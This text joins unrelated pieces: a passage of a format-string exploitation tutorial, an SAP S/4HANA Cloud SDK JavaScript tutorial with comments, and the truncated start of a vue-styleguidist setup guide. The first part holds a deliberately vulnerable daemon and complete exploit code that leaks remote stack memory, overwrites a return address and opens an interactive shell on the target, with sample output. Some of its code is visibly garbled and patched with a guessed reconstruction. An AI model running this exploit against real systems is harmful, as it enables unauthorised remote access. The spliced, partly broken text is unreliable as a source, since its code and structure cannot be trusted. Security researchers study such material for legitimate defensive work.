addr_buffer = read_at + (ptr-buf) - 4;
break;
}
read_at += (len-4+1);
memset (buf, 0x0, sizeof (buf));
get_addr_as_char(read_at, fmt);
write(sd, fmt, strlen(fmt));
}
-- --[ Guessing the return address ]-- --
On most of the Linux distributions, the top of the stack is at
0xc0000000. This is not true for all the distributions: Caldera put it
at 0x80000000 (BTW, if someone can explain me why ?). The space
reserved in it depends on the needs of the program (mainly local
variables). These are usually placed in the range 0xbfffXXXX, where <XX>
is an undefined byte. On the contrary, the instructions of the process
(.text section) are loaded from 0x08048000.
So, we have to read the remote stack to find something that looks
like:
Top of the stack
0x0804XXXX
0xbfffXXXX
Due to little endian, this is equivalent to looking for the string
0xff 0xbf XX XX 0x04 0x08. As we have seen, we don't have to consider
the first 4 bytes of the returned string:++;
}
if (addr_ret != -1) break;
The variable <addr_ret> is initialized with a very complex formula:
* addr_ret : the address we just read ;
* +i : the offset in the string we are looking for the pattern (we
can't use strstr() since our pattern has wildcards - undefined
bytes XX) ;
* -2 : the first bytes we discover in the stack are ff bf, but
he full word (i.e. saved %ebp) is written on 4 bytes. The -2
is for the 2 "least bytes" placed at the beginning of the word XX
XX ff bf ;
* +4 : this modification is due to the return address which is 4
bytes above the saved %ebp ;
* -4 : as you should be used to now, the first 4 bytes which are a
copy of the read address.
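The pattern-matching loop itself is garbled in this copy of the article; based on the formula just described, a plausible reconstruction (an assumption, not necessarily the author's exact code) is:

      for (i = 0; i + 5 < len; i++) {
        /* look for XX XX ff bf (saved %ebp) followed by XX XX 04 08 (saved %eip) */
        if ((buf[i] & 0xff) == 0xff && (buf[i+1] & 0xff) == 0xbf &&
            (buf[i+4] & 0xff) == 0x04 && (buf[i+5] & 0xff) == 0x08) {
          addr_ret = read_at + i - 2 + 4 - 4;
          fprintf(stderr, "[ret addr is: 0x%x (%d) ]\n", addr_ret, len);
          break;
        }
      }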
--[ 3. Exploitation ]--
So, since we now have all the requested parameters, the exploitation
in itself is not very difficult. We just have to replace the return
address of the vulnerable function (addr_ret) with the one of the
shellcode (addr_shellcode). The function fmtbuilder is taken from [5]
and build the format string sent to the server:
build_hn(buf, addr_ret, addr_shellcode, offset, 0);
write(sd, buf, strlen(buf));
Once the replacement is performed in the remote stack, we just have to
return from the vul() function. We then send the "quit" command
specially intended to that ;-)
strcpy(buf, "quit");
write(sd, buf, strlen(buf));
Lastly, the function interact() plays with the file descriptors to
allow us to use the gained shell.
In the next example, the exploit is started from bosley to charly :
$ ./expl-fmtd -i 192.168.1.1 -a 0xbfffed01
Using IP 192.168.1.1
Connected to 192.168.1.1
login sent [toto] (4)
passwd (shellcode) sent (10)
[Found offset = 6]
[buffer addr is: 0xbfffede0 (12) ]
buf = (12)
e0 ed ff bf e0 ed ff bf 25 36 24 73
[shell addr is: 0xbffff5f0 (60) ]
buf = (60)
e5 f5 ff bf 8b 04 08 28 fa ff bf 22 89 04 08 ff 2f 62 69 6e 2f 73 68
[ret addr is: 0xbffff5ec (60) ]
Building format string ...
Sending the quit ...
bye bye ...
Linux charly 2.4.17 #1 Mon Dec 31 09:40:49 CET 2001 i686 unknown
uid=500(raynal) gid=100(users)
exit
$
--[ 4. Conclusion ]--
Fewer format bugs are discovered ... fortunately. As we just saw, the
automation is not very difficult. The library fmtbuilder (see the
bibliography) also provides the necessary tools for that.
Here, the exploit starts its reading of the remote memory to an
arbitrary value. But if it is too low, the server crashes. The exploit
can be modified to explore the stack from the top to the bottom... but
the strategies used to identify some values have then to be slightly
adapted. The difficulty seems a bit greater.
The reading then starts from the top of the stack 0xc0000000-4. One
has to change the value of the variable addr_stack. Moreover, the
line read_at+=(len-4+1); has to be replaced with read_at-=4; In this
way, the argument -a is useless.
The disadvantage of this solution is that the return address is below
the input buffer. But all that is below this buffer comes from
function that are no more in the stack: these data are written in a
free region of the stack, so they can be modified at any time by the
process. So, the search of the return address has to be change
(several can be found above the vulnerable buffer ... but we can't
control whether they will be really used).
--[ Greetings ]--
Denis Ducamp and Renaud Deraison for their comments/fixes.
------------------------------------------------------------------------
--[ Appendix 1 : the server side fmtd ]--
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdarg.h>
#include <syslog.h>
void respond(char *fmt,...);
int vul(void)
{
char tmp[1024];
char buf[1024];
int len = 0;
syslog(LOG_ERR, "vul() -> tmp = 0x%x buf = 0x%x\n", tmp, buf);
while(1) {
memset(buf, 0, sizeof(buf));
memset(tmp, 0, sizeof(tmp));
if ( (len = read(0, buf, sizeof(buf))) <= 0 ) {
syslog(LOG_ERR, "vul() -> error while reading input buf [%s] (%d)",
buf, len);
exit(-1);
} /*
else
syslog(LOG_INFO, "vul() -> read %d bytes", len);
*/
if (!strncmp(buf, "quit", 4)) {
respond("bye bye ...\n");
return 0;
}
snprintf(tmp, sizeof(tmp)-1, buf);
respond("%s", tmp);
}
}
void respond(char *fmt,...)
{
va_list va;
char buf[1024];
int len = 0;
va_start(va,fmt);
vsnprintf(buf,sizeof(buf),fmt,va);
va_end(va);
len = write(STDOUT_FILENO,buf,strlen(buf));
/* syslog(LOG_INFO, "respond() -> write %d bytes", len); */
}
int main()
{
struct sockaddr_in sin;
int i,len = sizeof(struct sockaddr_in);
char login[16];
char passwd[1024];
openlog("fmtd", LOG_NDELAY | LOG_PID, LOG_LOCAL0);
/* get login */
memset(login, 0, sizeof(login));
respond("login: ");
if ( (len = read(0, login, sizeof(login))) <= 0 ) {
syslog(LOG_ERR, "login -> error while reading login [%s] (%d)",
login, len);
exit(-1);
} else
syslog(LOG_INFO, "login -> read login [%s] (%d) bytes", login, len);
/* get passwd */
memset(passwd, 0, sizeof(passwd));
respond("password: ");
if ( (len = read(0, passwd, sizeof(passwd))) <= 0 ) {
syslog(LOG_ERR, "passwd -> error while reading passwd [%s] (%d)",
passwd, len);
exit(-1);
} else
syslog(LOG_INFO, "passwd -> read passwd [%x] (%d) bytes", passwd, len);
/* let's run ... */
vul();
return 0;
}
------------------------------------------------------------------------
--[ Appendix 2 : the exploit side expl-fmtd ]--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <getopt.h>
char verbose = 0, debug = 0;
#define OCT( b0, b1, b2, b3, addr, str ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
if ( b0 * b1 * b2 * b3 == 0 ) { \
printf( "\n%s contains a NUL byte. Leaving...\n", str ); \
exit( EXIT_FAILURE ); \
} \
}
#define MAX_FMT_LENGTH 128
#define ADD 0x100
#define FOUR sizeof( size_t ) * 4
#define TWO sizeof( size_t ) * 2
#define BANNER "uname -a ; id"
#define MAX_OFFSET 255
int interact(int sock)
{
fd_set fds;
ssize_t ssize;
char buffer[1024];
write(sock, BANNER"\n", sizeof(BANNER));
while (1) {
FD_ZERO(&fds);
FD_SET(STDIN_FILENO, &fds);
FD_SET(sock, &fds);
select(sock + 1, &fds, NULL, NULL, NULL);
if (FD_ISSET(STDIN_FILENO, &fds)) {
ssize = read(STDIN_FILENO, buffer, sizeof(buffer));
if (ssize < 0) {
return(-1);
}
if (ssize == 0) {
return(0);
}
write(sock, buffer, ssize);
}
if (FD_ISSET(sock, &fds)) {
ssize = read(sock, buffer, sizeof(buffer));
if (ssize < 0) {
return(-1);
}
if (ssize == 0) {
return(0);
}
write(STDOUT_FILENO, buffer, ssize);
}
}
return(-1);
}
u_long resolve(char *host)
{
struct hostent *he;
u_long ret;
if(!(he = gethostbyname(host)))
{
herror("gethostbyname()");
exit(-1);
}
memcpy(&ret, he->h_addr, sizeof(he->h_addr));
return ret;
}
int
build_hn(char * buf, unsigned int locaddr, unsigned int retaddr, unsigned int offset, unsigned int base)
{
unsigned char b0, b1, b2, b3;
unsigned int high, low;
int start = ((base / (ADD * ADD)) + 1) * ADD * ADD;
int sz;
/* <locaddr> : where to overwrite */
OCT(b0, b1, b2, b3, locaddr, "[ locaddr ]");
sz = snprintf(buf, TWO + 1, /* 8 char to have the 2 addresses */
"%c%c%c%c" /* + 1 for the ending \0 */
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 2, b2, b1, b0);
/* where is our shellcode ? */
OCT(b0, b1, b2, b3, retaddr, "[ retaddr ]");
high = (retaddr & 0xffff0000) >> 16;
low = retaddr & 0x0000ffff;
return snprintf(buf + sz, MAX_FMT_LENGTH,
"%%.%hdx%%%d$n%%.%hdx%%%d$hn",
low - TWO + start - base,
offset,
high - low + start,
offset + 1);
}
void get_addr_as_char(u_int addr, char *buf) {
*(u_int*)buf = addr;
if (!buf[0]) buf[0]++;
if (!buf[1]) buf[1]++;
if (!buf[2]) buf[2]++;
if (!buf[3]) buf[3]++;
}
int get_offset(int sock) {
int i, offset = -1, len;
char fmt[128], buf[128];
for (i = 1; i<MAX_OFFSET && offset == -1; i++) {
snprintf(fmt, sizeof(fmt), "AAAA%%%d$x", i);
write(sock, fmt, strlen(fmt));
memset(buf, 0, sizeof(buf));
sleep(1);
if ((len = read(sock, buf, sizeof(buf))) < 0) {
fprintf(stderr, "Error while looking for the offset (%d)\n", len);
close(sock);
exit(EXIT_FAILURE);
}
if (debug)
fprintf(stderr, "testing offset = %d fmt = [%s] buf = [%s] len = %d\n",
i, fmt, buf, len);
if (!strcmp(buf, "AAAA41414141"))
offset = i;
}
return offset;
} *ip = "127.0.0.1", *ptr;
struct sockaddr_in sck;
u_int read_at, addr_stack = (u_int)0xbfffe0001; /* default bottom */
u_int addr_shellcode = -1, addr_buffer = -1, addr_ret = -1;
char buf[1024], fmt[128], c;
int port = 12345, offset = -1;
int sd, len, i;
while ((c = getopt(argc, argv, "dvi:p:a:o:")) != -1) {
switch (c) {
case 'i':
ip = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'a':
addr_stack = strtoul(optarg, NULL, 16);
break;
case 'o':
offset = atoi(optarg);
break;
case 'v':
verbose = 1;
break;
case 'd':
debug = 1;
break;
default:
fprintf(stderr, "Unknwon option %c (%d)\n", c, c);
exit (EXIT_FAILURE);
}
}
/* init the sockaddr_in */
fprintf(stderr, "Using IP %s\n", ip);
sck.sin_family = PF_INET;
sck.sin_addr.s_addr = resolve(ip);
sck.sin_port = htons (port);
/* open the socket */
if (!(sd = socket (PF_INET, SOCK_STREAM, 0))) {
perror ("socket()");
exit (EXIT_FAILURE);
}
/* connect to the remote server */
if (connect (sd, (struct sockaddr *) &sck, sizeof (sck)) < 0) {
perror ("Connect() ");
exit (EXIT_FAILURE);
}
fprintf (stderr, "Connected to %s\n", ip);
if (debug) sleep(10);
/* send login */
memset (buf, 0x0, sizeof(buf));
len = read(sd, buf, sizeof(buf));
if (strncmp(buf, "login", 5)) {
fprintf(stderr, "Error: no login asked [%s] (%d)\n", buf, len);
close(sd);
exit(EXIT_FAILURE);
}
strcpy(buf, "toto");
len = write (sd, buf, strlen(buf));
if (verbose) fprintf(stderr, "login sent [%s] (%d)\n", buf, len);
sleep(1);
/* passwd: shellcode in the buffer and in the remote stack */
len = read(sd, buf, sizeof(buf));
if (strncmp(buf, "password", 8)) {
fprintf(stderr, "Error: no password asked [%s] (%d)\n", buf, len);
close(sd);
exit(EXIT_FAILURE);
}
write (sd, shellcode, strlen(shellcode));
if (verbose) fprintf (stderr, "passwd (shellcode) sent (%d)\n", len);
sleep(1);
/* find offset */
if (offset == -1) {
if ((offset = get_offset(sd)) == -1) {
fprintf(stderr, "Error: can't find offset\n");
fprintf(stderr, "Please, use the -o arg to specify it.\n");
close(sd);
exit(EXIT_FAILURE);
}
if (verbose) fprintf(stderr, "[Found offset = %d]\n", offset);
}
/* look for the address of the shellcode in the remote stack */
memset (fmt, 0x0, sizeof(fmt));
read_at = addr_stack;
get_addr_as_char(read_at, fmt);
snprintf(fmt+4, sizeof(fmt)-4, "%%%d$s", offset);
write(sd, fmt, strlen(fmt));
sleep(1);
while((len = read(sd, buf, sizeof(buf))) > 0 &&
(addr_shellcode == -1 || addr_buffer == -1 || addr_ret == -1) ) {
if (debug) fprintf(stderr, "Read at 0x%x (%d)\n", read_at, len);
/* the shellcode */
if ((ptr = strstr(buf, shellcode))) {
addr_shellcode = read_at + (ptr-buf) - 4;
fprintf (stderr, "[shell addr is: 0x%x (%d) ]\n", addr_shellcode, len);
fprintf(stderr, "buf = (%d)\n", len);
for (i=0; i<len; i++) {
fprintf(stderr,"%.2x ", (int)(buf[i] & 0xff));
if (i && i%20 == 0) fprintf(stderr, "\n");
}
fprintf(stderr, "\n");
}
/* the input buffer */
if (addr_buffer == -1 && (ptr = strstr(buf, fmt))) {
addr_buffer = read_at + (ptr-buf) - 4;
fprintf (stderr, "[buffer addr is: 0x%x (%d) ]\n", addr_buffer, len);
fprintf(stderr, "buf = (%d)\n", len);
for (i=0; i<len; i++) {
fprintf(stderr,"%.2x ", (int)(buf[i] & 0xff));
if (i && i%20 == 0) fprintf(stderr, "\n");
}
fprintf(stderr, "\n\n");
}
/* return address */
if (addr_buffer != -1) {++;
}
}
read_at += (len-4+1);
if (len == sizeof(buf)) {
fprintf(stderr, "Warning: this has not been tested !!!\n");
fprintf(stderr, "len = %d\nread_at = 0x%x", len, read_at);
read_at-=strlen(shellcode);
}
get_addr_as_char(read_at, fmt);
write(sd, fmt, strlen(fmt));
}
/* send the format string */
fprintf (stderr, "Building format string ...\n");
memset(buf, 0, sizeof(buf));
build_hn(buf, addr_ret, addr_shellcode, offset, 0);
write(sd, buf, strlen(buf));
sleep(1);
read(sd, buf, sizeof(buf));
/* call the return while quiting */
fprintf (stderr, "Sending the quit ...\n");
strcpy(buf, "quit");
write(sd, buf, strlen(buf));
sleep(1);
interact(sd);
close(sd);
return 0;
}
------------------------------------------------------------------------
--[ Bibliography ]--
1. More info on format bugs par P. "kalou" Bouchareine
()
2. Format Bugs: What are they, Where did they come from,... How to
exploit them par lamagra
(lamagra@digibel.org <lamagra@digibel.org>)
3. Éviter les failles de sécurité dès le développement d'une
application - 4 : les chaînes de format par F. Raynal, C.
Grenier, C. Blaess
( ou)
4. Exploiting the format string vulnerabilities par scut (team TESO)
()
5. fmtbuilder-howto par F. Raynal et S. Dralet
()
------------------------------------------------------------------------
Frédéric Raynal - <pappy@miscmag.com>
|
https://packetstormsecurity.com/files/25978/remotefmt-howto.txt.html
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Technical Articles
Writing an Example Application using the SAP S/4HANA Cloud SDK for JavaScript (Beta)
As you may have seen in our announcement blog post, we have released the SAP S/4HANA Cloud SDK for JavaScript (beta)! In time for TechEd Las Vegas we bring the benefits of the SAP S/4HANA Cloud SDK also to anyone developing in JavaScript or TypeScript.
This blog post is part of a bigger series about extending SAP S/4HANA using the SAP S/4HANA Cloud SDK. You can find the full series here.
Goal of this blog post
The goal of this blog post is to enable you to build your own SAP S/4HANA side-by-side extensions application in JavaScript using the SAP S/4HANA Cloud SDK for JavaScript. In this tutorial, we will cover the following steps:
- Prerequisites
- Downloading the JS SDK.
- Setting up an application using Express.js
- Installing the SDK to your application.
- Building an example service that retrieves data from the SAP S/4HANA system.
- Deploying your application to SAP Cloud Platform Cloud Foundry
Please note: the SAP S/4HANA Cloud SDK is available as beta. It is not meant for productive use, and SAP does not make any guarantee about releasing a productive version. Any API and functionality may change without notice.
Prerequisites
Access to the beta requires you to be an SAP customer and sign a Test and Evaluation Agreement (TEA). We have described the process in the announcement blog post.
In order to complete this tutorial, you will need to install Node.js on your machine. If you have not used Node.js before, you can either grab the latest executable from the official Node.js website, or install it using your package manager of choice.
Furthermore, you should have access to SAP Cloud Platform Cloud Foundry and an SAP S/4HANA Cloud system. If you do not have access to Cloud Foundry, you can create a trial account. Additionally, we recommend using the command line tools for CloudFoundry (
cf CLI). Installation instructions can be found in the CloudFoundry documentation.
In case you don’t have access to an SAP S/4HANA Cloud system, for the scope of this tutorial you can also use our mock server, that provides an exemplary OData business partner service.
One final disclaimer: While the SDK is fully compatible with pure JavaScript, it is written in and designed for TypeScript. TypeScript is a superset of ECMAScript 6, adding an optional but powerful type system to JavaScript. If you are not familiar with TypeScript, we highly recommend checking it out!
Download the SDK
Since the SDK is a beta version, you currently cannot get it from the NPM registry. Instead, after signing in the TEA as described in the separate blog post, visit SAP’s Service Marketplace and download the SDK there. Save the SDK to a directory of your choice. The downloaded file will be a .tgz, so go ahead and unzip the archive. That’s all for downloading! We will come back to the SDK after setting up our application.
Setting up an Application using Express.js
Now we will setup our application. We use Express.js to build a backend application exposing RESTful APIs. In this section, we will set up the plain application as you would do with any Node.js application, still without any integration to SAP S/4HANA.
Start by creating a directory
example-app. In this directory, create a
package.json file with the following content:
{ "name": "example-app", "version": "1.0.0", "description": "Example application using the SAP S/4HANA Cloud SDK for JavaScript.", "scripts": { "start": "ts-node src/server.ts" }, "dependencies": { "express": "^4.16.3" }, "devDependencies": { "ts-node": "^7.0.1", "typescript": "^3.0.3" } }
The
package.json acts as a project descriptor used by
npm, the Node.js package manager.
Proceed by entering the
example-app directory in your terminal and call
npm install. This will install the necessary dependencies for our application.
Additionally, since this is a TypeScript project, create another file called
tsconfig.json with the following content:
{ "typeAcquisition": { "enable": true } }
Now create a directory
src inside your
example-app and add two files: First,
server.ts, that will contain the logic for starting the webserver.
import app from './application';

const port = 8080;

app.listen(port, () => {
  console.log('Express server listening on port ' + port);
});
Secondly,
application.ts, that contains the logic and routes of our application.
import * as bodyParser from 'body-parser';
import * as express from 'express';
import { Request, Response } from 'express';

class App {
  public app: express.Application;

  constructor() {
    this.app = express();
    this.config();
    this.routes();
  }

  private config(): void {
    this.app.use(bodyParser.json());
    this.app.use(bodyParser.urlencoded({ extended: false }));
  }

  private routes(): void {
    const router = express.Router();

    router.get('/', (req: Request, res: Response) => {
      res.status(200).send('Hello, World!');
    });

    this.app.use('/', router);
  }
}

export default new App().app;
The most important part in this file is the following, where we define our first API in the
routes function:
router.get('/', (req: Request, res: Response) => {
  res.status(200).send('Hello, World!');
});
This instructs the router to respond to HTTP GET requests (
router.get) on the root path of the application (
'/', the first parameter) by calling the function provided as the second parameter. In this function, we simply send a response with status code 200 and
'Hello, World!' as body.
In order to start your server, return to your terminal and execute
npm start. This will in turn execute the command we have defined for
start in the
scripts section of our
package.json.
"scripts": { "start": "ts-node src/server.ts" }
After calling
npm start, you should see the following output in your terminal:
Express server listening on port 8080. Now you can visit http://localhost:8080 in your browser, and you will be greeted with
Hello, World! in response!
To stop the server, press Ctrl+C or Cmd+C.
Adding the SDK to your project
Now it’s finally time to add the SDK to the project. In a previous step, we downloaded the SDK as a
.tgz archive and unpacked it, which gave us a directory called
s4sdk. Now we need to copy this directory into the
example-app directory. Then, we can add the SDK as a dependency to our application by adding two entries to the
dependencies section of our
package.json so that this section looks as follows (don’t forget to add a comma behind the second line):
"dependencies": { "express": "^4.16.3", "s4sdk-core": "file:s4sdk/s4sdk-core", "s4sdk-vdm": "file:s4sdk/s4sdk-vdm" }
The
file: prefix instructs npm to install the dependencies from your machine instead of fetching them from the npm registry.
Your project directory should now look as follows:
Call
npm install again to install the SDK to your project. In a development environment such as Visual Studio Code, this will also make available the types of the SAP S/4HANA Cloud SDK for code completion.
Now that we can use the SDK, let’s write an API endpoint that fetches business partners from your SAP S/4HANA Cloud system.
To do so, we will add another route in the
routes function in
application.ts.
import { BusinessPartner } from 's4sdk-vdm/business-partner-service';

router.get('/businesspartners', (req: Request, res: Response) => {
  BusinessPartner.requestBuilder()
    .getAll()
    .top(100)
    .execute()
    .then((businessPartners: BusinessPartner[]) => {
      res.status(200).send(businessPartners);
    });
});
When using a modern editor like Visual Studio Code, the correct imports should be automatically suggested to you. If this fails for whatever reason, add the following line to the import declarations:
import { BusinessPartner } from 's4sdk-vdm/business-partner-service';
Let’s go through the function step by step:
First, we define a new route that matches on GET requests on
/businesspartners. Then, we use the SDK’s Virtual Data Model (VDM) to retrieve business partners from our SAP S/4HANA Cloud system. The VDM, originally introduced in the SAP S/4HANA Cloud SDK for Java, allows you to query OData services exposed by your SAP S/4HANA Cloud system in a type-safe, fluent and explorative way. More details can be found in this blog post introducing the VDM in the SDK for Java.
We start by creating a request builder on our desired entity, in this case by calling
BusinessPartner.requestBuilder(). This in turn will offer you a function for each operation that you can perform on the respective entity. In the case of business partners, the possible operations are
getAll(),
getByKey(),
create() and
update(). We choose
getAll(), since we want to retrieve a list of business partners. Now we can choose from the variety of options to further refine our query, such as
select() and
filter(). However, for now we keep it simple by only calling
top(100) to restrict the query to the first 100 results. Finally, we call
execute(). The SDK takes care of the low level infrastructure code of the request.
By default, any call to an SAP S/4HANA system performed using the VDM will be done asynchronously and returns a promise. We handle the promise by calling
then() and providing it with a function that handles the query result. As you can see from the signature of the callback function, promises returned by the VDM are automatically typed with the respective entity, in this case we get an array of business partners (
BusinessPartner[]). Now we can simply send a response with status code 200 and the business partners retrieved from the SAP S/4HANA system as response body.
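If you prefer async/await over explicit promise chaining, the same route could be written roughly as follows. This is only a sketch; the error handling (returning status 500 with a generic message) is an assumption about how you might want to surface failures, not part of the tutorial's API.

router.get('/businesspartners', async (req: Request, res: Response) => {
  try {
    // execute() returns a promise, so it can be awaited
    const businessPartners: BusinessPartner[] = await BusinessPartner.requestBuilder()
      .getAll()
      .top(100)
      .execute();
    res.status(200).send(businessPartners);
  } catch (error) {
    // hypothetical error handling
    res.status(500).send('Failed to fetch business partners');
  }
});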
Running the Application Locally
Before deploying the application to Cloud Foundry, let’s test the integration locally first. To do so, we need to supply our destination configuration to designate the SAP S/4HANA system to connect to. This can be achieved by running the following command in your command line, or the equivalent for setting environment variables in your shell (the below is for the Windows command prompt):
set destinations=[{"name":"ErpQueryEndpoint", "url": "", "username": "myuser", "password":"mypw"}]
Make sure to replace the values for url, username and password with the respective values matching your SAP S/4HANA Cloud system.
If you restart the server using
npm start and navigate to http://localhost:8080/businesspartners, you should see a list of business partners retrieved from your SAP S/4HANA Cloud system.
Deploying the Application to Cloud Foundry
In order to deploy the application on Cloud Foundry, we need to provide a deployment descriptor in the form of a
manifest.yml file. Add this file to the root directory of your application.
---
applications:
- name: example-app
  memory: 256M
  random-route: true
  buildpacks:
    - nodejs_buildpack
  command: npm start
  env:
    destinations: >
      [
        {
          "name": "ErpQueryEndpoint",
          "url": "",
          "username": "<USERNAME>",
          "password": "<PASSWORD>"
        }
      ]
Pay attention to the
env section. Here, we provide the destination settings for the SAP S/4HANA system we want to connect to. Simply substitute the value for each entry with the respective values for your SAP S/4HANA system.
Additionally, we need to perform one more addition to our app’s
package.json.
"engines": { "node": "10.14.1" }
This tells npm which version of Node.js to use as runtime environment. Omitting this from the
package.json leads to CloudFoundry defaulting to an older version of node. However, the VDM relies on some features only present in newer version of Node.js. Additionally, as in any project, it is good practice to specifiy the version of the runtime environment to protect yourself from errors introduced in unwanted version changes down the line.
The resulting
package.json should look as follows:
{
  "name": "example-app",
  "version": "1.0.0",
  "description": "Example application using the SAP S/4HANA Cloud SDK for JavaScript.",
  "scripts": {
    "start": "ts-node src/server.ts"
  },
  "dependencies": {
    "express": "^4.16.3",
    "s4sdk-core": "file:s4sdk/s4sdk-core",
    "s4sdk-vdm": "file:s4sdk/s4sdk-vdm"
  },
  "devDependencies": {
    "ts-node": "^7.0.1",
    "typescript": "^3.0.3"
  },
  "engines": {
    "node": "10.14.1"
  }
}
Finally, you can push the application by executing
cf push on your command line in the root directory of the application. This uses the Cloud Foundry command line interface (CLI), whose installation is described in this blog post. The
cf CLI will automatically pick up the
manifest.yml. At the end of the deployment,
cf CLI will print the URL under which you can access your application. If you now visit the
/businesspartners route of your application at this URL, you should see a list of business partners that have been retrieved from your SAP S/4HANA system! This requires that the URL of the system you connect to is accessible from Cloud Foundry.
This concludes our tutorial.
Give us Feedback!
Are you excited about the SAP S/4HANA Cloud SDK for JavaScript? Are there features that you would love to see in the future? Or did you have problems completing the tutorial? In any case, we would love to hear your feedback in the comments to this blog post! In case of technical questions, you can also reach out to us on StackOverflow using the tags
s4sdk and
javascript.
Going even further
If you have completed the tutorial up to this point, you are equipped with the basics of extending your SAP S/4HANA Cloud system with a Node.js application. However, so far we have only explored a small part of the SDK’s capabilities. While the SDK for JavaScript is a Beta release and, thus, only supports a subset of the features of the SAP S/4HANA Cloud SDK for Java, we do provide the same capabilities as the Java SDK in terms of the virtual data model for integrating with your SAP S/4HANA system!
Complex Queries using the VDM
Let’s take a look at a more complex query:
import { BusinessPartner, Customer } from 's4sdk-vdm/business-partner-service';
import { and, or } from 's4sdk-core';

BusinessPartner.requestBuilder()
  .getAll()
  .select(
    BusinessPartner.FIRST_NAME,
    BusinessPartner.LAST_NAME,
    BusinessPartner.TO_CUSTOMER.select(Customer.CUSTOMER_FULL_NAME)
  )
  .filter(
    or(
      BusinessPartner.BUSINESS_PARTNER_CATEGORY.equals('1'),
      and(
        BusinessPartner.FIRST_NAME.equals('Foo'),
        BusinessPartner.TO_CUSTOMER.filter(Customer.CUSTOMER_NAME.notEquals('bar'))
      )
    )
  )
  .execute();
Again, we want to retrieve a list of business partners. This time, however, we added a select and a filter clause to our query. This highlights two of the VDM’s advantages over building queries by hand: type-safety and discoverability.
As you can see in the filter clause, you can simply get an overview over which fields are present on the business partner by typing
BusinessPartner. in your editor. The autocompletion of modern editors, such as Visual Studio Code, will then provide a list of suggestions, which you can navigate to find the fields you need, without having to refer to the service’s metadata. Furthermore, we ensure that each query you build is type-safe. This means that if you try to e.g. select a field that does not exist on the respective entity, your editor will report a type mismatch, effectively preventing you from writing incorrect queries.
In this example, we restrict our selection to the business partner’s first and last name. Additionally, we add
Customer, a related entity, to our selection, from which we only use the full name.
The same fields can also be used for filtering. As you can see, you can build arbitrarily complex filter clauses using the
and() and
or() functions. Each field also provides a function for each filter operation that can be used on the respective field. Additionally, we again make sure that the values you provide in the filter clause match the type of the respective field. If, for example, you’d try to filter a string-typed field by a number (e.g.
BusinessPartner.FIRST_NAME.equals(5)), a type mismatch will be reported.
Destinations and Authentication
In the examples so far, we have simply called
execute() in our queries. If no parameter is provided,
execute() will by default try to load a destination named “ErpQueryEndpoint” from your application’s environment variables (the one we configured in the
manifest.yml, remember?). You can of course provide more destinations. If you want to use a specific destination for your OData queries, you do so by passing the destination’s name to the execute call, like this:
execute('MyCustomDestination')
Additionally, we provide the option to pass a destination configuration directly to the VDM.
execute({ url: "", username: "MyUser", password: "MyPassword" })
Finally, if you want to make use of OAuth2 or other means instead of basic authentication, you can also set the
Authorization header directly.
BusinessPartner.requestBuilder()
  ...
  .withCustomHeaders({ Authorization: "Bearer <EncodedJWT>" })
  .execute()
If you provide an
Authorization header using this mechanism, the VDM will ignore the username and password otherwise provided by any destination configuration.
Hello,
Nice blog, this SDK is really welcomed. I try to use it to connect to my on premise backend, through destination/connectivity bound to cloud connector. Though this may not be its primary purpose, can you provide me some hints on how to define destinations with proxy?
DestinationConfiguration does not accept parameters such as proxy. Is there a workaround to set proxy configuration in the underlying axios request?
Hello Kim,
in the beta, we do not natively support the Cloud Connector (in contrast to the SAP S/4HANA Cloud SDK for Java, where this is handled by the SDK).
With the beta of the SDK for JavaScript, you would have to implement the necessary communication with the destination and connectivity service yourself and apply the resulting HTTP headers with the withCustomHeaders method mentioned above. Regarding proxy, I believe you can define a global proxy configuration for axios with axios.defaults.proxy, but I haven't tried to apply this with the Cloud Connector.
Best regards,
Henning
Hello Henning,
Nice suggestion, I did not look into default configuration options of axios. It works, I actually used the axios interceptor to be able to filter on backend URLs.
Something like:
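A rough sketch of such an interceptor (the backend URL prefix, proxy host, and port below are placeholders, and axios is assumed to be the underlying HTTP client):

import axios from 'axios';

// apply the proxy only for requests that target the on-premise backend
axios.interceptors.request.use(config => {
  if (config.url && config.url.startsWith('https://my-onpremise-backend.example.com')) {
    config.proxy = { host: 'proxy.example.com', port: 8080 };
  }
  return config;
});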
Thank you for your help!
Hello all,
at the moment is it possible to execute a request with expand parameter? for example
my request code is something like
I don't find a method like expand or similar
Thank you for your help!
Hi Donato,
you can handle expand in the select function, e.g.:
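For example, a sketch along these lines (the BusinessPartnerAddress entity and the exact field names are assumptions based on the standard business partner service):

BusinessPartner.requestBuilder()
  .getAll()
  .select(
    BusinessPartner.FIRST_NAME,
    BusinessPartner.TO_CUSTOMER,
    BusinessPartner.TO_BUSINESS_PARTNER_ADDRESS.select(BusinessPartnerAddress.CITY_CODE)
  )
  .execute();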
This would select the FirstName of BusinessPartner, the full related Customer entity, as well as the City Code of all related BusinessPartnerAddresses.
Hope that helps!
Hi Dennis,
Thank you so much! now it works fine
Thanks a lot for your blog, it's amazing!
|
https://blogs.sap.com/2018/10/02/writing-an-example-application-using-the-sap-s4hana-cloud-sdk-for-javascript-beta/
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Creating styleguides has been always hard work. It can take not only a huge amount of time, especially if you want to make it interactive, and it usually gets out of date as time goes by.
Vue-styleguidist is a nice and easy-to-use tool to create component style guides with interactive documentation in Vue.js. While Storybook for Vue has a manual approach to create interactive docs, vue-styleguidist statically analyzes your source code creating the docs automatically.
Setup vue-styleguidist
In your Vue.js project, install
vue-styleguidist as a dev dependency from npm:
$ npm install --save-dev vue-styleguidist
Add the following two npm scripts to your package.json file:
package.json
{ "scripts": { "styleguide": "vue-styleguidist server", "styleguide:build": "vue-styleguidist build" } }
Finally, you have to setup some webpack config in order to make it work. If you already have a webpack.config.js in your project’s root, vue-styleguidist will load that config.
If that’s not the case, you must create a styleguide.config.js in your project’s root. In there, you could add the webpack config by loading it from another file:
styleguide.config.js
module.exports = { webpackConfig: require('./somewhere/webpack.config.js') };
Or you could even load a different webpack config:
styleguide.config.js
module.exports = {
  webpackConfig: {
    module: {
      rules: [
        {
          test: /\.vue$/,
